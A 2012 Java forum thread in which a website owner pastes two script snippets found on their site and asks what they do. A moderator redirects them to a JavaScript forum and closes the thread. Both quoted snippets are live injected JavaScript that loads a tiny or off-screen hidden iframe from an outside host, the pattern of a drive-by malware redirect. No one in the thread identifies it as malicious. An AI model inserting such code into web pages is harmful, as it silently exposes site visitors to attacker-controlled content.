Results 1 to 3 of 3
Thread: What is this code for?
- 10-26-2012, 01:05 PM #1
Member
- Join Date
- Oct 2012
- Posts
- 2
- Rep Power
- 0
What is this code for?
Hi guys,
I'm new to Java and this code is on my website. Would somebody be kind enough to tell me what it is please?
</div><!--23b416--><script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe'); a.src = 'http://netbiosemp.net/in.cgi?2'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '3px'; a.style.width = '3px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('ad9')) { document.write('<div id=\'ad9\'></div>'); document.getElementById('ad9').appendChild(a); }})();</script><!--/23b416-->
- 10-26-2012, 01:38 PM #2
Member
- Join Date
- Oct 2012
- Posts
- 2
- Rep Power
- 0
Re: What is this code for?
Please guys. Now when I view source it says
</div><!--23b416--><script type="text/javascript" language="javascript" > var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://srlqpdbd.pro/in.cgi?2');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c76 4265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendCh ild(_f);</script><!--/23b416-->
</body>
</html>
- 10-26-2012, 01:46 PM #3
Re: What is this code for?
That's not Java. It's JavaScript. Find a JavaScript forum, or better still find a JavaScript tutorial and learn enough to figure it out for yourself.
Closing this thread as it's off topic here.
db
THREAD CLOSEDWhy do they call it rush hour when nothing moves? - Robin Williams
Similar Threads
-
this code is not working I Dont know why ? Public void close the last code!!
By lukote04 in forum New To JavaReplies: 1Last Post: 03-25-2012, 02:40 AM -
My code was not executed properly.It will jumping to exception handling.my code is
By vinay4051 in forum EclipseReplies: 3Last Post: 08-10-2011, 09:17 AM -
servlet include method copying sorce code and executing source code as output how to
By shamkuma2k in forum Advanced JavaReplies: 0Last Post: 08-07-2011, 08:32 PM -
C server code - Java CLient Code _ TCP Connection Problem
By rmd22 in forum NetworkingReplies: 0Last Post: 02-21-2011, 11:50 AM -
Generating Code Automatically Using Custom code Template In Eclipse
By JavaForums in forum EclipseReplies: 1Last Post: 04-26-2007, 03:52 PM


LinkBack URL
About LinkBacks

Bookmarks